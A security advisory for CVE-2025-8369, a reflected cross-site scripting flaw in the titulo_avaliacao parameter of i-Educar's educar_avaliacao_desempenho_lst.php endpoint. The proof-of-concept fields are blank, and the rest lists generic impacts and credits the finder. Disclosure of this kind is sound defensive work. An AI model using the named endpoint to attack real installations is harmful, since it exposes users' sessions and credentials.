CVE-2025-8369: Cross-Site Scripting (XSS) Reflected in endpoint educar_avaliacao_desempenho_lst.php parameter titulo_avaliacao
CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-8369
Summary
A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the educar_avaliacao_desempenho_lst.php endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the titulo_avaliacao parameter.
Details
Vulnerable Endpoint: educar_avaliacao_desempenho_lst.php
Parameter: titulo_avaliacao
PoC
Payload:
Encoded
| |
Decoded
| |
URL
| |
When a user accesses this crafted URL, the script is executed immediately in the browser, confirming the vulnerability.
Impact
- Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.
- Downloading malware: Attackers can trick users into downloading and installing malware on their computers.
- Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.
- Stealing credentials: Attackers can steal a user's credentials.
- Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.
- Defacing websites: Attackers can deface a website by altering its content.
- Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.
- Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.
Reference
https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md
Finder
By: CVE-Hunters